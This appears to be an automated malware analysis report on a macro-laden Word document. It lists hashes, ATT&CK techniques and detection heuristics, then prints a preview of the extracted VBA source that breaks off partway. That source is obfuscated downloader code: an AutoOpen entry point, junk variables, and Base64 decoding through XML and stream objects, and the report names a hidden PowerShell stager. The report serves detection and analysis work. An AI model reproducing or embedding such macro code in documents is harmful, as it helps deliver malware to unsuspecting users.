Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 040e61e10a7a85c2…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 165.5 KB
Created: 2017-05-03 20:33:00
Authoring application: Microsoft Office Word
First seen: 2017-05-13
MD5: 1e6f3631ec0655f646d141cef590ccd7
SHA-1: ac135fbaf1e79dd4ad984d4e98da8632f814b21d
SHA-256: 040e61e10a7a85c23041c1f0e4635dd2ea9307787eb17e88f80372529e9209d5
Risk Score: 342

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1059.001 PowerShell
  • T1204.002 Malicious File
  • T1566.001 Spearphishing Attachment

The sample contains critical heuristics indicating the presence of VBA macros, specifically an AutoOpen macro that utilizes Shell() and CreateObject() calls. A Base64-decoded Shell command stager was identified, which decodes to 'powershell -WindowStyle Hidden $wscript = new'. This strongly suggests the macro's purpose is to download and execute a secondary payload via PowerShell. The ClamAV detection further supports its malicious nature as a downloader.

Heuristics (9)

  • ClamAV: Doc.Downloader.WithMacro-6310867-0 [critical] (CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Downloader.WithMacro-6310867-0
  • VBA macros detected [medium, 5 related findings] (OLE_VBA_MACROS)
    Document contains VBA macro code
  • Shell() call in VBA [critical] (OLE_VBA_SHELL)
    Shell() call in VBA
  • VBA Base64-decoded Shell command stager [critical] (OLE_VBA_BASE64_SHELL_COMMAND_STAGER)
    VBA auto-exec macro decodes Base64 string literals into command or script-launch text and executes the result with Shell. This catches cmd/cscript/PowerShell/VBS launchers hidden from plain keyword matching.
  • AutoOpen macro [high] (OLE_VBA_AUTOOPEN)
    AutoOpen macro
  • CreateObject call [high] (OLE_VBA_CREATEOBJ)
    CreateObject call
  • VBA p-code auto-exec with execution tokens [high] (OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker [medium] (OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL [info] (EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (channel: in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 18305 bytes
SHA-256: a89f93a6c1b46ba0ba161523db5cb7464bd54efbcca17ba85e227add2ab5c6e6

Preview of the extracted script (first 1,000 lines):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Module1"
Sub AutoOpen()

Dim X7oxiVPhL As Long
X7oxiVPhL = -509207468
Dim UG7aJ As String
UG7aJ = StrConv(PBArpzn, vbLowerCase)
Dim DR5N8 As Byte
DR5N8 = 209
UO6PHWcs
End Sub

Attribute VB_Name = "Module2"
Public Function rAXwWdJpR(ByVal ENKIwcCZ)
Dim BoMwxCX
BoMwxCX = AscB("s")
Dim rgBAie As Single
rgBAie = Fix(30498.797580191)
Dim MXt67olH3
Dim sVmv3N
Dim WQigaL682 As String
WQigaL682 = RTrim(Z5WEAa)
Dim Rfpxg02W As Integer
Rfpxg02W = Sgn(-26322)
Dim ATlgF4vrn As Byte
ATlgF4vrn = 110

Dim OSevOC As Integer
OSevOC = 21494
Dim WzJqud8K As Single
WzJqud8K = Sgn(46516.790475328)
Set MXt67olH3 = CreateObject("msxml2.domdocument")
Dim A1xFcG As Integer
A1xFcG = Sgn(14883)
Dim JatvVwZQ As Single
JatvVwZQ = 32162.08666797
Dim Mo6Yz As Byte
Mo6Yz = 184
Dim sQ5KstHD As Boolean
sQ5KstHD = True
Dim VSuib As Byte
VSuib = 201
Dim HbT1h As Boolean
HbT1h = True
Set sVmv3N = MXt67olH3.CreateElement(zpcJf)
Dim UdkSHsYgy
UdkSHsYgy = vbNullString
Dim vtX9SJBT As Byte
vtX9SJBT = 119
Dim yotLwu
yotLwu = AscB("W")
With sVmv3N
Dim UhNusA As Double
UhNusA = Int(7103.2352652453)
Dim RViY9lhQ As Integer
RViY9lhQ = 29028
Dim p1hdoZr As Integer
p1hdoZr = -9837
sVmv3N.DataType = "bin." & zpcJf

Dim n1wFbICU As Byte
n1wFbICU = 199
Dim WLOx8tPG As Single
WLOx8tPG = 60066.403182607
Dim aw21cE9yM As Boolean
aw21cE9yM = True
sVmv3N.Text = ENKIwcCZ
End With
Dim ZYXNFjb As Double
ZYXNFjb = Val(45599.526797947)
Dim TlEmyNGf As String
TlEmyNGf = UCase(VsCInjaA)
Dim kCvLfKP
kCvLfKP = Trim(wLSCdU)
Dim hm1JuwNV As String
hm1JuwNV = Gg8nC1
Dim qnEy5ZQf As Byte
qnEy5ZQf = 80
rAXwWdJpR = IJtdmg(sVmv3N.nodeTypedValue)

Dim T0KHd As Byte
T0KHd = 220
Dim e6ukp As String
e6ukp = UCase(B18P43tY)
Set sVmv3N = Nothing
Set MXt67olH3 = Nothing
End Function
Function IJtdmg(Binary)
Dim PROniZQxz As Single
PROniZQxz = Fix(34705.866860916)
Dim BAOmJTw9 As Byte
BAOmJTw9 = 119
Dim f3j2dJDN
f3j2dJDN = Asc("i")
Const U6o1en = 2
Const UGL4xUv = 1
Dim NcCwI2 As Single
NcCwI2 = Sgn(46814.133724586)
Dim xBcmUae As Double
xBcmUae = 56353.436635835
Dim B7ul1Jgi As Double
B7ul1Jgi = 45138.809175597
Dim Lv69oiS As Single
Lv69oiS = 63317.924212844
Dim fUtC1FLDR
fUtC1FLDR = Len(ys6KqfCh)
Dim QtsEvr As Integer
QtsEvr = Sgn(25616)
Dim FbeO4dx
Dim cPXcbNWO As Single
cPXcbNWO = Sgn(62798.584131366)
Dim E9OYKvsk As Byte
E9OYKvsk = 11
Dim Ey9AYzaLX As Double
Ey9AYzaLX = 28399.655817253
Dim PSvzf7PYO As Single
PSvzf7PYO = Sgn(82.768346808908)

Dim WUFrI1qoz As Long
WUFrI1qoz = -848897742
Dim GQumR As String
GQumR = Len(jnf5HE)
Dim dIDtnvSH As Single
dIDtnvSH = 298.67982250033
Set FbeO4dx = CreateObject("adodb.stream")
Dim zH8wo6u4t As Single
zH8wo6u4t = Sgn(20803.585300553)
Dim ole1tVEvO As Single
ole1tVEvO = Val(13931.819669379)
With FbeO4dx

Dim A6fMY As Long
A6fMY = 0
Dim lFKNiU As Boolean
lFKNiU = True
Dim kl4Lx As Long
kl4Lx = 0
.Type = UGL4xUv

Dim BVWoB As Double
BVWoB = 11313.63957818
Dim uZbB5YA9 As Boolean
uZbB5YA9 = True
.Open
Dim SEUHb0 As Integer
SEUHb0 = Sgn(6536)
Dim wWFh8kIP As Long
wWFh8kIP = Sgn(0)
.Write Binary
Dim qs6UaqY As String
qs6UaqY = UCase(zIwE316)
Dim JBc6HN2Z As Integer
JBc6HN2Z = -22828
Dim SJ7Mcam As Boolean
SJ7Mcam = False
Dim V7lzXwa8T As Byte
V7lzXwa8T = 253
Dim VGBOc9CmI
VGBOc9CmI = "5"
.Position = 0

Dim vLvThc4 As Boolean
vLvThc4 = False
Dim V9yLQ As Single
V9yLQ = Sgn(46128.359746306)
.Type = U6o1en

Dim kFkJPgEc As Long
kFkJPgEc = -1076017696
Dim dILsr As Double
dILsr = Sgn(25231.673889325)
Dim S0U8gwlWm As Double
S0U8gwlWm = 37869.947359013

Dim nfR9lkzu As Byte
nfR9lkzu = 250
Dim LkIxSiyN6 As Integer
LkIxSiyN6 = Sgn(11773)
Dim MtoRz
MtoRz = UCase(qr60x)
Dim l6KxC As String
l6Kx
... (truncated)